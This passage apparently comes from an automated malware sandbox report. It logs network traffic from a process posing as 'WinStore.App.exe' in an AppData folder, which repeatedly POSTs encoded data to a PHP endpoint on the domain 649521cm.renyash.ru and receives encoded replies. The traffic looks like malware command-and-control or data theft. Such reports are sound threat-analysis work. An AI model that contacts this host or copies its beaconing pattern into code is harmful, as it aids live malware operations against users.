Dec 26, 2024 10:22:58.296411991 CET	49805	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:58.645107031 CET	49805	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:09.501281977 CET	49834	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:09.620893002 CET	80	49834	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:09.621032000 CET	49834	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:09.631072998 CET	49834	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:09.751244068 CET	80	49834	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:09.980571032 CET	49834	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:10.100224018 CET	80	49834	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:10.707240105 CET	80	49834	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:10.761384964 CET	49834	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:11.032952070 CET	80	49834	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:11.033154011 CET	80	49834	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:11.033337116 CET	49834	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:11.271640062 CET	49834	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:22.026844025 CET	49865	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:22.146466017 CET	80	49865	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:22.146836042 CET	49865	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:22.147296906 CET	49865	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:22.266777039 CET	80	49865	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:22.496273041 CET	49865	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:22.615772963 CET	80	49865	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:23.232242107 CET	80	49865	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:23.277101040 CET	49865	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:23.563349962 CET	80	49865	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:23.563376904 CET	80	49865	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:23.563440084 CET	49865	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:23.773221970 CET	49865	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:34.537416935 CET	49894	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:34.656863928 CET	80	49894	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:34.656935930 CET	49894	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:34.657239914 CET	49894	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:34.776698112 CET	80	49894	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:35.011635065 CET	49894	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:35.131144047 CET	80	49894	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:35.742151976 CET	80	49894	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:35.792694092 CET	49894	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:36.069084883 CET	80	49894	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:36.069180965 CET	80	49894	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:36.069226980 CET	49894	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:36.336411953 CET	49894	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:43.007724047 CET	49915	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:43.127298117 CET	80	49915	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:43.128113031 CET	49915	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:43.128113031 CET	49915	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:43.247633934 CET	80	49915	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:43.480618000 CET	49915	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:43.600162983 CET	80	49915	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:44.213403940 CET	80	49915	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:44.261485100 CET	49915	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:44.472907066 CET	80	49915	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:44.472975016 CET	80	49915	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:44.473022938 CET	49915	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:44.691051006 CET	49915	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:55.339931965 CET	49943	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:55.459956884 CET	80	49943	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:55.460089922 CET	49943	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:55.460490942 CET	49943	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:55.579956055 CET	80	49943	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:55.808653116 CET	49943	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:55.928215027 CET	80	49943	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:56.544862032 CET	80	49943	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:56.589807034 CET	49943	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:56.883531094 CET	80	49943	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:56.883552074 CET	80	49943	104.21.38.84	192.168.2.5
Dec 26, 2024 10:23:56.883606911 CET	49943	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:23:57.074274063 CET	49943	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:24:04.481765032 CET	49964	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:24:04.603399992 CET	80	49964	104.21.38.84	192.168.2.5
Dec 26, 2024 10:24:04.603503942 CET	49964	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:24:04.603971004 CET	49964	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:24:04.724663973 CET	80	49964	104.21.38.84	192.168.2.5
Dec 26, 2024 10:24:04.949470997 CET	49964	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:24:05.069227934 CET	80	49964	104.21.38.84	192.168.2.5
Dec 26, 2024 10:24:05.688652992 CET	80	49964	104.21.38.84	192.168.2.5
Dec 26, 2024 10:24:05.730289936 CET	49964	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:24:06.014471054 CET	80	49964	104.21.38.84	192.168.2.5
Dec 26, 2024 10:24:06.014744043 CET	80	49964	104.21.38.84	192.168.2.5
Dec 26, 2024 10:24:06.014828920 CET	49964	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:24:11.306371927 CET	49964	80	192.168.2.5	104.21.38.84

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 26, 2024 10:22:09.267719984 CET	51264	53	192.168.2.5	1.1.1.1
Dec 26, 2024 10:22:09.619663954 CET	53	51264	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 26, 2024 10:22:09.267719984 CET	192.168.2.5	1.1.1.1	0x81f7	Standard query (0)	649521cm.renyash.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 26, 2024 10:22:09.619663954 CET	1.1.1.1	192.168.2.5	0x81f7	No error (0)	649521cm.renyash.ru		104.21.38.84	A (IP address)	IN (0x0001)	false
Dec 26, 2024 10:22:09.619663954 CET	1.1.1.1	192.168.2.5	0x81f7	No error (0)	649521cm.renyash.ru		172.67.220.198	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

649521cm.renyash.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49712	104.21.38.84	80	2556	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe

Timestamp	Bytes transferred	Direction	Data
Dec 26, 2024 10:22:09.747394085 CET	307	OUT	POST /PipeToJavascriptRequestpollcpubasetestprivateTemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 649521cm.renyash.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 26, 2024 10:22:10.105778933 CET	344	OUT	Data Raw: 00 0a 04 07 03 0d 01 0a 05 06 02 01 02 04 01 03 00 07 05 0a 02 05 03 09 02 00 0c 04 06 0e 01 50 0d 04 06 0e 00 54 06 51 0c 51 04 06 05 54 06 56 06 54 0e 0b 0d 53 06 56 01 04 07 0d 04 04 06 09 03 07 0c 09 00 01 07 05 0d 0e 0e 0e 0e 07 0b 01 02 06 Data Ascii: PTQQTVTSVPRR\L~Cce\`[auvsThRyBco`hchl\|Xlcz\|hct`A}e~V@@x}fO}bu
Dec 26, 2024 10:22:10.857481956 CET	25	IN	HTTP/1.1 100 Continue
Dec 26, 2024 10:22:11.206784964 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 09:22:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MfKxYj%2BOEBgvpZeHvc2n46dkc7FmJF89%2BRnEui%2BLZJEIWVmSsJ6RYaDSX8jT%2FPQbyy2Ltt3vmNdHQsDcGWMAZQdMLNeunntzWBmcXVFqXitPbgQGpg0zFKvQp29laB8ML6mTqfwU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f800140ec557ca0-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3985&min_rtt=1962&rtt_var=4783&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=651&delivery_rate=80431&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 34 34 0d 0a 56 4a 7d 59 78 43 7b 4b 6f 4c 73 59 7f 61 73 01 7c 77 5a 53 7c 60 66 53 7b 73 7c 4d 6a 5c 52 04 77 4d 7a 55 6e 5f 53 06 76 65 68 45 69 5b 78 01 55 4b 71 42 77 4c 73 44 6b 5c 6a 5c 7c 01 69 54 6f 58 52 08 7d 70 7c 59 76 5c 71 07 77 58 6d 4a 7f 61 7d 5c 7d 42 70 08 7e 67 59 01 75 4c 7b 06 7c 5c 5b 05 7d 59 69 4a 7b 59 55 5f 78 77 78 05 7b 7d 59 48 6d 62 77 5c 7b 5d 75 5c 7f 59 7f 58 6c 5e 78 00 7d 4c 7b 03 75 07 67 5c 7a 51 41 5b 6b 67 7c 0d 7d 61 5f 4e 61 42 78 03 7b 7c 73 58 76 63 62 0c 79 5f 71 49 7d 7c 6a 4c 7a 61 5f 5a 77 73 78 58 75 58 7b 5b 77 61 7a 50 7e 5d 79 5f 77 62 6d 04 76 66 60 09 7f 52 65 05 77 6f 6c 04 7f 70 7c 00 6f 6f 73 03 6f 5e 66 02 6b 6d 5a 08 60 5e 7c 04 7e 62 54 09 7e 7d 6f 09 78 53 61 5f 7e 5c 5c 5d 7b 5d 46 51 7d 7c 51 50 7f 63 78 0a 7c 64 61 59 6c 43 7c 5a 7b 5c 7c 4b 7e 71 51 4b 69 77 67 0b 7c 70 57 41 7b 70 74 42 7e 5c 7c 46 74 70 61 51 7b 5c 79 02 77 66 60 03 7c 76 64 06 7d 76 5b 0c 77 62 55 07 7f 4c 79 4d 7d 67 6a 0c 7b 58 74 0c 7e 73 7b 4a 76 62 5b 06 74 [TRUNCATED] Data Ascii: 444VJ}YxC{KoLsYas\|wZS\|`fS{s\|Mj\RwMzUn_SvehEi[xUKqBwLsDk\j\\|iToXR}p\|Yv\qwXmJa}\}Bp~gYuL{\|\[}YiJ{YU_xwx{}YHmbw\{]u\YXl^x}L{ug\zQA[kg\|}a_NaBx{\|sXvcby_qI}\|jLza_ZwsxXuX{[wazP~]y_wbmvf`Rewolp\|ooso^fkmZ`^\|~bT~}oxSa_~\\]{]FQ}\|QPcx\|daYlC\|Z{\\|K~qQKiwg\|pWA{ptB~\\|FtpaQ{\ywf`\|vd}v[wbULyM}gj{Xt~s{Jvb[tayOrK~RtN~YUJwa{I{ryJ~NqJxI^{w`BymsIy\lzsfNNlxIp}bQMual}\|}gZ}quuR`{lpIwpTzayH\|lb{aXuM{v_pvav
Dec 26, 2024 10:22:11.206810951 CET	656	IN	Data Raw: 41 7f 5e 6a 03 74 62 75 01 75 5b 5e 0a 7f 6c 61 06 77 6c 68 07 7c 73 52 49 79 7c 5d 03 7b 60 72 06 7c 7d 70 08 74 77 68 07 7d 4c 6e 0d 7e 53 73 09 7b 53 5c 05 7d 5c 79 4d 7c 60 74 08 7c 52 52 43 7d 4e 52 41 7c 67 62 4d 78 7d 67 01 78 5c 78 02 7f Data Ascii: A^jtbuu[^lawlh\|sRIy\|]{`r\|}ptwh}Ln~Ss{S\}\yM\|`t\|RRC}NRA\|gbMx}gx\xqw~wUON}@zM\|B}\^It]Wz_qvHp~vh@}Xmvb}by\|wPxHh\|sUuLitO}H\|_~}lx~gUuqw{L_~`iyg`Nxw\|{S{zLpH{]r{]NZ{gx~Lou_{\iRlX}wR@havRaB`lo\|HvpTmOf]jlf_z\

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49726	104.21.38.84	80	3652	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe

Timestamp	Bytes transferred	Direction	Data
Dec 26, 2024 10:22:22.445460081 CET	360	OUT	POST /PipeToJavascriptRequestpollcpubasetestprivateTemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 649521cm.renyash.ru Content-Length: 336 Expect: 100-continue Connection: Keep-Alive
Dec 26, 2024 10:22:22.792725086 CET	336	OUT	Data Raw: 00 0a 04 04 03 0b 01 0a 05 06 02 01 02 05 01 0b 00 06 05 08 02 00 03 01 07 00 0a 0d 06 07 03 09 0d 02 06 0c 07 02 04 51 0c 07 02 05 05 57 06 0f 04 51 0c 0a 0f 54 01 07 06 01 06 03 01 05 04 0f 01 00 0f 5c 06 06 05 09 0f 07 0e 55 0a 02 0b 07 05 03 Data Ascii: QWQT\UUR\L}S`XtrPXve^B~evo\|\|sZDoUgHzs}YhT\|w^\|}e~V@{mvey
Dec 26, 2024 10:22:23.529555082 CET	25	IN	HTTP/1.1 100 Continue
Dec 26, 2024 10:22:23.854340076 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 09:22:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0soU3teDNIuCReQCSMaMzAxNeo%2BtddQlgHBOv5xCRHqmWi6EpxAd8ashW5k6Pe07UhHg7o%2BEu58TsPHCYeVeR20y%2BjMB36oe8i90JE29P78P%2BoEHAQZZpAGd3B79bjpSo55oI7Mq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f800190196542ab-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3752&min_rtt=1688&rtt_var=4762&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=696&delivery_rate=80193&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 34 34 0d 0a 56 4a 7e 00 6f 7e 64 5b 7b 62 7b 5c 7e 61 56 5f 7d 5e 64 50 7f 73 79 42 7a 60 60 00 7e 61 6c 01 74 4d 7a 54 6d 4f 53 44 61 65 64 4b 69 71 78 01 55 4b 71 42 77 4c 73 44 6b 5c 6a 5c 7c 01 69 54 6f 58 52 08 7d 70 7c 59 76 5c 71 07 77 58 6d 4a 7f 61 7d 5c 7d 42 70 08 7e 67 59 01 75 4c 7b 06 7c 5c 61 02 6a 60 7d 00 7b 49 5e 43 78 5e 68 4c 79 6d 55 49 79 62 70 46 78 5d 6e 03 7d 73 68 4b 78 77 78 44 7e 72 60 5d 62 71 52 04 7a 51 41 5b 6b 67 7c 0d 7d 61 5f 4e 61 42 78 03 7b 7c 73 58 76 63 62 0c 79 5f 71 49 7d 7c 6a 4c 7a 61 5f 5a 77 73 78 58 75 58 7b 5b 77 61 7a 50 7e 5d 79 5f 77 62 6d 04 76 66 60 09 7f 52 65 05 77 6f 6c 04 7f 70 7c 00 6f 6f 73 03 6f 5e 66 02 6b 6d 5a 08 60 5e 7c 04 7e 62 54 09 7e 7d 6f 09 78 53 61 5f 7e 5c 5c 5d 7b 5d 46 51 7d 7c 51 50 7f 63 78 0a 7c 64 61 59 6c 43 7c 5a 7b 5c 7c 4b 7e 71 51 4b 69 77 67 0b 7c 70 57 41 7b 70 74 42 7e 5c 7c 46 74 70 61 51 7b 5c 79 02 77 66 60 03 7c 76 64 06 7d 76 5b 0c 77 62 55 07 7f 4c 79 4d 7d 67 6a 0c 7b 58 74 0c 7e 73 7b 4a 76 62 5b 06 74 [TRUNCATED] Data Ascii: 444VJ~o~d[{b{\~aV_}^dPsyBz``~altMzTmOSDaedKiqxUKqBwLsDk\j\\|iToXR}p\|Yv\qwXmJa}\}Bp~gYuL{\|\aj`}{I^Cx^hLymUIybpFx]n}shKxwxD~r`]bqRzQA[kg\|}a_NaBx{\|sXvcby_qI}\|jLza_ZwsxXuX{[wazP~]y_wbmvf`Rewolp\|ooso^fkmZ`^\|~bT~}oxSa_~\\]{]FQ}\|QPcx\|daYlC\|Z{\\|K~qQKiwg\|pWA{ptB~\\|FtpaQ{\ywf`\|vd}v[wbULyM}gj{Xt~s{Jvb[tayOrK~RtN~YUJwa{I{ryJ~NqJxI^{w`BymsIy\lzsfNNlxIp}bQMual}\|}gZ}quuR`{lpIwpTzayH\|lb{aXuM{v_p
Dec 26, 2024 10:22:23.854393959 CET	659	IN	Data Raw: 76 61 76 41 7f 5e 6a 03 74 62 75 01 75 5b 5e 0a 7f 6c 61 06 77 6c 68 07 7c 73 52 49 79 7c 5d 03 7b 60 72 06 7c 7d 70 08 74 77 68 07 7d 4c 6e 0d 7e 53 73 09 7b 53 5c 05 7d 5c 79 4d 7c 60 74 08 7c 52 52 43 7d 4e 52 41 7c 67 62 4d 78 7d 67 01 78 5c Data Ascii: vavA^jtbuu[^lawlh\|sRIy\|]{`r\|}ptwh}Ln~Ss{S\}\yM\|`t\|RRC}NRA\|gbMx}gx\xqw~wUON}@zM\|B}\^It]Wz_qvHp~vh@}Xmvb}by\|wPxHh\|sUuLitO}H\|_~}lx~gUuqw{L_~`iyg`Nxw\|{S{zLpH{]r{]NZ{gx~Lou_{\iRlX}wR@havRaB`lo\|HvpTmOf]jlf

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49757	104.21.38.84	80	1196	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe

Timestamp	Bytes transferred	Direction	Data
Dec 26, 2024 10:22:35.416728973 CET	307	OUT	POST /PipeToJavascriptRequestpollcpubasetestprivateTemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 649521cm.renyash.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 26, 2024 10:22:35.761626005 CET	344	OUT	Data Raw: 05 01 01 07 06 0b 04 05 05 06 02 01 02 0d 01 00 00 04 05 0e 02 04 03 0a 07 0f 0d 04 05 0e 01 54 0e 06 04 0f 07 02 03 02 0f 00 04 02 05 01 07 05 04 53 0f 01 0c 03 07 07 07 01 04 02 05 52 04 0c 00 57 0f 0d 06 02 05 02 0f 06 0e 52 0a 06 0c 52 05 51 Data Ascii: TSRWRRQSRU\L~c}_va~]ahBzYwl{_]wXx{KzcyX\|SwI`e~V@xCT}ry
Dec 26, 2024 10:22:36.501286983 CET	25	IN	HTTP/1.1 100 Continue
Dec 26, 2024 10:22:36.828895092 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 09:22:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tfKloURWnWzHaa04ODUuRNuhIB0O4yF0r3YQ0sIsV9xJUSN1mF%2B98mrCtbwoBT0V2t3ic%2Bs8OhUa8aMXvnq4F2vuDuaKiQMD8VF57ROoj28hHkcEeiqJXyTYiAnSWB9HS%2F3UTYEG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8001e129891902-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3172&min_rtt=1448&rtt_var=3992&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=651&delivery_rate=95756&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 34 34 0d 0a 56 4a 7e 4d 6c 6d 7f 44 78 62 56 4b 68 58 7f 44 69 59 63 0b 7c 59 65 0c 79 4d 5a 4c 7e 71 70 01 74 63 58 54 7a 61 7d 4a 77 76 59 5b 6a 61 78 01 55 4b 71 42 77 4c 73 44 6b 5c 6a 5c 7c 01 69 54 6f 58 52 08 7d 70 7c 59 76 5c 71 07 77 58 6d 4a 7f 61 7d 5c 7d 42 70 08 7e 67 59 01 75 4c 7b 06 7c 5c 79 49 69 60 79 01 7b 01 63 5d 79 64 77 59 7b 43 7b 01 79 62 78 02 7b 5d 7e 03 6b 06 6c 4b 78 59 7c 06 7c 62 5a 5d 76 4f 60 02 7a 51 41 5b 6b 67 7c 0d 7d 61 5f 4e 61 42 78 03 7b 7c 73 58 76 63 62 0c 79 5f 71 49 7d 7c 6a 4c 7a 61 5f 5a 77 73 78 58 75 58 7b 5b 77 61 7a 50 7e 5d 79 5f 77 62 6d 04 76 66 60 09 7f 52 65 05 77 6f 6c 04 7f 70 7c 00 6f 6f 73 03 6f 5e 66 02 6b 6d 5a 08 60 5e 7c 04 7e 62 54 09 7e 7d 6f 09 78 53 61 5f 7e 5c 5c 5d 7b 5d 46 51 7d 7c 51 50 7f 63 78 0a 7c 64 61 59 6c 43 7c 5a 7b 5c 7c 4b 7e 71 51 4b 69 77 67 0b 7c 70 57 41 7b 70 74 42 7e 5c 7c 46 74 70 61 51 7b 5c 79 02 77 66 60 03 7c 76 64 06 7d 76 5b 0c 77 62 55 07 7f 4c 79 4d 7d 67 6a 0c 7b 58 74 0c 7e 73 7b 4a 76 62 5b 06 74 [TRUNCATED] Data Ascii: 444VJ~MlmDxbVKhXDiYc\|YeyMZL~qptcXTza}JwvY[jaxUKqBwLsDk\j\\|iToXR}p\|Yv\qwXmJa}\}Bp~gYuL{\|\yIi`y{c]ydwY{C{ybx{]~klKxY\|\|bZ]vO`zQA[kg\|}a_NaBx{\|sXvcby_qI}\|jLza_ZwsxXuX{[wazP~]y_wbmvf`Rewolp\|ooso^fkmZ`^\|~bT~}oxSa_~\\]{]FQ}\|QPcx\|daYlC\|Z{\\|K~qQKiwg\|pWA{ptB~\\|FtpaQ{\ywf`\|vd}v[wbULyM}gj{Xt~s{Jvb[tayOrK~RtN~YUJwa{I{ryJ~NqJxI^{w`BymsIy\lzsfNNlxIp}bQMual}\|}gZ}quuR`{lpIwpTzayH\|lb{aXuM{v_pvavA
Dec 26, 2024 10:22:36.828928947 CET	654	IN	Data Raw: 5e 6a 03 74 62 75 01 75 5b 5e 0a 7f 6c 61 06 77 6c 68 07 7c 73 52 49 79 7c 5d 03 7b 60 72 06 7c 7d 70 08 74 77 68 07 7d 4c 6e 0d 7e 53 73 09 7b 53 5c 05 7d 5c 79 4d 7c 60 74 08 7c 52 52 43 7d 4e 52 41 7c 67 62 4d 78 7d 67 01 78 5c 78 02 7f 71 77 Data Ascii: ^jtbuu[^lawlh\|sRIy\|]{`r\|}ptwh}Ln~Ss{S\}\yM\|`t\|RRC}NRA\|gbMx}gx\xqw~wUON}@zM\|B}\^It]Wz_qvHp~vh@}Xmvb}by\|wPxHh\|sUuLitO}H\|_~}lx~gUuqw{L_~`iyg`Nxw\|{S{zLpH{]r{]NZ{gx~Lou_{\iRlX}wR@havRaB`lo\|HvpTmOf]jlf_z\y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49773	104.21.38.84	80	5228	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe

Timestamp	Bytes transferred	Direction	Data
Dec 26, 2024 10:22:43.863332987 CET	343	OUT	POST /PipeToJavascriptRequestpollcpubasetestprivateTemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 649521cm.renyash.ru Content-Length: 336 Expect: 100-continue Connection: Keep-Alive
Dec 26, 2024 10:22:44.214843988 CET	336	OUT	Data Raw: 00 02 04 01 03 08 01 02 05 06 02 01 02 05 01 02 00 03 05 0b 02 06 03 0c 00 56 0a 00 04 0e 00 07 0c 0e 04 01 00 51 03 05 0d 01 06 03 07 54 02 06 07 04 0e 5a 0a 05 05 03 01 04 06 51 05 52 06 58 05 05 0e 08 06 05 05 08 0b 04 0c 52 0a 06 0e 05 05 07 Data Ascii: VQTZQRXRWP\L~Ck^fc\TYu[xklqwRX\|`o^l\|dXopeXh}xNc^l}_~V@@x}zO~uy
Dec 26, 2024 10:22:44.948236942 CET	25	IN	HTTP/1.1 100 Continue
Dec 26, 2024 10:22:45.278744936 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 09:22:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zkbqRskNQ1YBSi6HVdMzw2ixGSx78yH1%2Bv1eF%2B9GtNhrlh3%2FjRScNWlCPBYx74jKFn7uTIvmE72vmdMdz3Pr1kSFzlIERAj1HS4OCOCqQDf0E0wDpvHKFjjS5UUdyZbABEL2zemJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f800215ff4342ce-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3100&min_rtt=1587&rtt_var=3623&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=679&delivery_rate=106584&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 34 34 0d 0a 56 4a 7e 06 7b 6d 56 5a 6f 4c 7b 5c 7e 62 74 58 7e 5e 6f 40 7f 5e 57 0a 6e 5d 70 01 7d 5b 64 03 63 5d 7e 51 79 4f 7e 59 76 75 60 4b 69 5b 78 01 55 4b 71 42 77 4c 73 44 6b 5c 6a 5c 7c 01 69 54 6f 58 52 08 7d 70 7c 59 76 5c 71 07 77 58 6d 4a 7f 61 7d 5c 7d 42 70 08 7e 67 59 01 75 4c 7b 06 7c 5c 5b 04 6a 5e 75 4a 7b 59 63 58 6f 49 5e 4d 7b 7d 64 58 6e 62 70 04 6c 60 66 4c 7f 73 63 59 78 49 74 4b 7e 71 7b 4f 61 07 70 48 7a 51 41 5b 6b 67 7c 0d 7d 61 5f 4e 61 42 78 03 7b 7c 73 58 76 63 62 0c 79 5f 71 49 7d 7c 6a 4c 7a 61 5f 5a 77 73 78 58 75 58 7b 5b 77 61 7a 50 7e 5d 79 5f 77 62 6d 04 76 66 60 09 7f 52 65 05 77 6f 6c 04 7f 70 7c 00 6f 6f 73 03 6f 5e 66 02 6b 6d 5a 08 60 5e 7c 04 7e 62 54 09 7e 7d 6f 09 78 53 61 5f 7e 5c 5c 5d 7b 5d 46 51 7d 7c 51 50 7f 63 78 0a 7c 64 61 59 6c 43 7c 5a 7b 5c 7c 4b 7e 71 51 4b 69 77 67 0b 7c 70 57 41 7b 70 74 42 7e 5c 7c 46 74 70 61 51 7b 5c 79 02 77 66 60 03 7c 76 64 06 7d 76 5b 0c 77 62 55 07 7f 4c 79 4d 7d 67 6a 0c 7b 58 74 0c 7e 73 7b 4a 76 62 5b 06 74 [TRUNCATED] Data Ascii: 